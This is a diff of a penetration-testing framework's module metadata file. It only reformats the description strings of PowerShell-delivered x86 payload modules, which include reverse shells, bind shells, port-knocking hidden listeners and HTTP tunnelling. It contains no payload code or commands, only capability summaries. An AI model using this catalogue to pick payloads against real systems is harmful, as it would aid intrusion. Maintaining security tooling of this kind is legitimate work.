@@ -179440,7 +180286,7 @@
      "Spencer McIntyre",
      "jduck <jduck@metasploit.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Generate a tight loop in the target process",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nGenerate a tight loop in the target process",
    "references": [

    ],
@@ -179512,7 +180358,7 @@
      "corelanc0d3r <peter.ve@corelan.be>",
      "jduck <jduck@metasploit.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Spawns a dialog via MessageBox using a customizable title, text & icon",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nSpawns a dialog via MessageBox using a customizable title, text & icon",
    "references": [

    ],
@@ -179551,7 +180397,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179591,7 +180437,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179630,7 +180476,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179669,7 +180515,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179708,7 +180554,7 @@
      "OJ Reeves",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179747,7 +180593,7 @@
      "OJ Reeves",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179786,7 +180632,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179827,7 +180673,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179866,7 +180712,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179904,7 +180750,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179945,7 +180791,7 @@
      "bannedit <bannedit@metasploit.com>",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\ndata/hop/hop.php to the PHP server you wish to use as a hop.",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -179984,7 +180830,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180023,7 +180869,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180062,7 +180908,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTPS (Windows wininet)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows wininet)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180103,7 +180949,7 @@
      "corelanc0d3r <peter.ve@corelan.be>",
      "amaloteaux <alex_maloteaux@metasploit.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP using SSL with custom proxy support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP using SSL with custom proxy support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180142,7 +180988,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180180,7 +181026,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180219,7 +181065,7 @@
      "OJ Reeves",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180258,7 +181104,7 @@
      "OJ Reeves",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180297,7 +181143,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180336,7 +181182,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180376,7 +181222,7 @@
      "hdm <x@hdm.io>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180417,7 +181263,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180458,7 +181304,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180497,7 +181343,7 @@
      "OJ Reeves",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180537,7 +181383,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTP (Windows winhttp)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180577,7 +181423,7 @@
      "hdm <x@hdm.io>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Tunnel communication over HTTPS (Windows winhttp)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTPS (Windows winhttp)",
    "references": [
      "URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
      "URL-https://github.com/rapid7/ReflectiveDLLInjection"
@@ -180613,7 +181459,7 @@
      "Spencer McIntyre",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Stub payload for interacting with a Meterpreter Service",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service",
    "references": [

    ],
@@ -180648,7 +181494,7 @@
      "Spencer McIntyre",
      "hdm <x@hdm.io>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Stub payload for interacting with a Meterpreter Service",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nStub payload for interacting with a Meterpreter Service",
    "references": [

    ],
@@ -180687,7 +181533,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -180726,7 +181572,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -180764,7 +181610,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -180803,7 +181649,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -180840,7 +181686,7 @@
      "skape <mmiller@hick.org>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -180877,7 +181723,7 @@
      "skape <mmiller@hick.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -180915,7 +181761,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -180955,7 +181801,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [

    ],
@@ -180993,7 +181839,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -181029,7 +181875,7 @@
      "jt <jt@klake.org>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [

    ],
@@ -181067,7 +181913,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -181104,7 +181950,7 @@
      "skape <mmiller@hick.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -181141,7 +181987,7 @@
      "skape <mmiller@hick.org>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181179,7 +182025,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181217,7 +182063,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -181256,7 +182102,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181296,7 +182142,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181336,7 +182182,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181374,7 +182220,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -181413,7 +182259,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -181452,7 +182298,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -181490,7 +182336,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -181529,7 +182375,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -181566,7 +182412,7 @@
      "jt <jt@klake.org>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -181603,7 +182449,7 @@
      "jt <jt@klake.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -181641,7 +182487,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -181681,7 +182527,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [

    ],
@@ -181719,7 +182565,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -181755,7 +182601,7 @@
      "skape <mmiller@hick.org>",
      "jt <jt@klake.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [

    ],
@@ -181793,7 +182639,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -181830,7 +182676,7 @@
      "jt <jt@klake.org>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [

    ],
@@ -181867,7 +182713,7 @@
      "jt <jt@klake.org>",
      "spoonm <spoonm@no$email.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181905,7 +182751,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -181943,7 +182789,7 @@
      "hdm <x@hdm.io>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)",
    "references": [

    ],
@@ -181982,7 +182828,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182022,7 +182868,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182062,7 +182908,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker",
    "references": [

    ],
@@ -182100,7 +182946,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker with UUID Support",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support",
    "references": [

    ],
@@ -182139,7 +182985,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection. First, the port will need to be knocked from\n                          the IP defined in KHOST. This IP will work as an authentication method\n                          (you can spoof it with tools like hping). After that you could get your\n                          shellcode from any IP. The socket will appear as \"closed,\" thus helping to\n                          hide the shellcode",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
    "references": [

    ],
@@ -182178,7 +183024,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "Borja Merino <bmerinofe@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection from a hidden port and spawn a command shell to the allowed host.",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
    "references": [

    ],
@@ -182216,7 +183062,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)",
    "references": [

    ],
@@ -182255,7 +183101,7 @@
      "sf <stephen_fewer@harmonysecurity.com>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for an IPv6 connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -182291,7 +183137,7 @@
      "ege <egebalci@pm.me>",
      "UserExistsError"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a pipe connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)",
    "references": [

    ],
@@ -182327,7 +183173,7 @@
      "ege <egebalci@pm.me>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)",
    "references": [

    ],
@@ -182365,7 +183211,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)",
    "references": [

    ],
@@ -182405,7 +183251,7 @@
      "mihi",
      "RageLtMan"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection",
    "references": [

    ],
@@ -182442,7 +183288,7 @@
      "hdm <x@hdm.io>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Listen for a connection with UUID Support (Windows x86)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)",
    "references": [

    ],
@@ -182478,7 +183324,7 @@
      "ege <egebalci@pm.me>",
      "skape <mmiller@hick.org>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Use an established connection",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection",
    "references": [

    ],
@@ -182516,7 +183362,7 @@
      "skape <mmiller@hick.org>",
      "sf <stephen_fewer@harmonysecurity.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker over IPv6",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6",
    "references": [

    ],
@@ -182552,7 +183398,7 @@
      "ege <egebalci@pm.me>",
      "OJ Reeves"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker via a named pipe pivot",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
    "references": [

    ],
@@ -182588,7 +183434,7 @@
      "ege <egebalci@pm.me>",
      "vlad902 <vlad902@gmail.com>"
    ],
-    "description": "Execute an x86 payload from a command via PowerShell. Connect back to the attacker (No NX)",
+    "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)",
    "references": [

